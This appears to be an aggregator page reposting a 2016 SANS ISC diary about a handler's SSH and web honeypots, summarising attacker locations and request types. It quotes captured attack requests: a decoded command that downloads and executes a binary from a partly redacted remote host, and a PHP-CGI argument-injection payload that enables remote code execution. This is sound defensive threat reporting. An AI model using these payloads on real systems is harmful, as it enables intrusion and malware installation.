One Article Review
| Source |  SANS Institute |
|---|---|
| Identifiant | 170965 |
| Date de publication | 2016-10-06 09:37:20 (vue: 2016-10-06 09:37:20) |
| Titre | Checking my honeypot day, (Thu, Oct 6th) |
| Texte | A number of the handlers, including myself, run a number of honeypots around the planet. Unfortunately I dont get to play with them as much as I want to. There are a bunch of automated processes in place,but on occasion I have a honeypot day/night where I check how they are doing and to have a look to see what people are up to,aswell as take a look at the executables being pulled. The main systems I have going at the moment are aSSH honeypot (kippo, soon to be cowrie), and a plain oldweb server. Looking at the last month or so,there are a few interesting things popping up as well as the usual suspects. The following are the top 10 locations attacking the web server." /> A fairly mixed bunch. The attacks are mostly the general stuff, fairly typical for most organisations that have some sort of web presence. The site is empty so the only things we see are fully automated checks. These are requests like: (checking for file access)PROPFIND /webdav/ HTTP/1.1 (exploitation) GET /shell?%63%64%20%2F%74%6D%70%26%26%20%77%67%65%74%20%68%74%74%70%3A%2F%2F%32%32%32%2E%31%38%36%2E%32%31%2E%34%32%3A%33%33%38%39%30%2F%63%62%71%26%26%20%63%68%6D%6F%64%20%2B%78%20%63%62%71%26%26%20%2E%2F%63%62%71 which is --cd /tmp wget hxxp://222.186.xx.xx:33890/cbq chmod +x cbq ./cbq (the xx are mine) (admin tool access)GET //phpMyAdmin ..... Various types of requests (scanner)GET /muieblackcat HTTP/1.1 (scanning) GET /w00tw00t.at.ISC.SANS.DFind: (no that is not us) (file inclusion)POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E which is -- phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n (openProxy Check)CONNECT mx-tw.mail.gm0.yahoodns.net:25 The locations containthe usual suspects (NL, PL CN). SG was a little bit of a surprise, likewise CA, I dont usually get traffic from those spots. The SSH logs were interesting although I had to make it the top 30. I suspect the pattern is relatively clear. Seems likeNanjingis a busy spot. Ive mentioned in a previous post (about a year ago) that the whole 222.186.0.0/16 subnet can easily be blocked and your SSH brute forcing attempts will go down significantly. Looks like the subnet is still heavily at it. This pattern is repeated on other honeypots in different regions. " /> On this particular honeypot I allow access when the correct password is provided. the top 10 in this case are as follows:" /> In this case a Russian IP address was the most active, although the actual location for the IP is in Prague (RU provider). They upload one stage which then fetches more nastiness. However, my honeypot doesnt take it that far. The CN locations seem more interested in just guessing passwords and not actually doing much more than that. Most of the actual conenctions are usually from the US, NL and DE (although NL must have been having a few bad months). On the password and userid front the main user accounts and passwords used were:"> Common users used Common passwords used |
| Envoyé | Oui |
| Condensat | //phpmyadmin /cbq /muieblackcat /shell /tmp /w00tw00t /webdav/ 0/16 007jamesbond 123123 1234 12345 123456 1234567890 186 22+ 222 64+ 65+ 654 66+ 68/ 6e+ 6th 74+ ^$**^ about access accounts active activities actual actually address admin ago all allow allowed alpine also although always are around assh aswell attacking attacks attempted attempts attribution audits automated automatically bad basedir=none+ basis because become been being bit block blocked brute bunch busy but can cant case cbq center check checked checking checks cheers chmod clear code command common commons conenctions connect connections considering containthe correct cowrie creative d+allow d+auto d+disable d+open d+safe d+suhosin daily day day/night dealt default dfind: did different doesnt doing dont down easily edu empty environments error etc even evil executables exploitation fairly far fetches file file=php://input+ following follows: forcing friend from front ftpuser fulfill fully functions=+ general get gm0 goes going guessing guest had handlers have having heavily honeypot honeypots how however http/1 https://isc hxxp://222 inbound include=on+ including inclusion information infrastructure intel interested interesting interesting/amusing internet inweb ips isc ive just keys kippo last least license life like like: likenanjingis likewise list little location locations logs look looking looks mail main mainly make mark mentioned mine mixed mode=off+ moment month months more most mostly much must myself nastiness net:25 noncommercial not nothing number occasion oct often oldweb one only openproxy or#$ oracle organisations other outbound page part particular password passwords pattern people phppath/php place plain planet play plcmspip please popping post prague prepend presence previous processes propfind provided provider providing proxies public pulled purpose raspberry rather real regions regularly relatively remember repeated request requests responsibilities resulting root run running russian same sans scanner scanning scans see seem seems send serve server siem significantly simulation=on+ site some soon sort spot spots ssh sshd stage states status storm strong stuff subnet support supposed sure surprise suspect suspects systems take test than them then these things those though threat thu time tool top touch traffic try types typical ubnt unfortunately united upload url use used user userid users usual usually value various vulnerability want web well were: wget what when where which whole will within word xx:33890/cbq yahoodns year your |
| Tags | |
| Stories | Yahoo |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.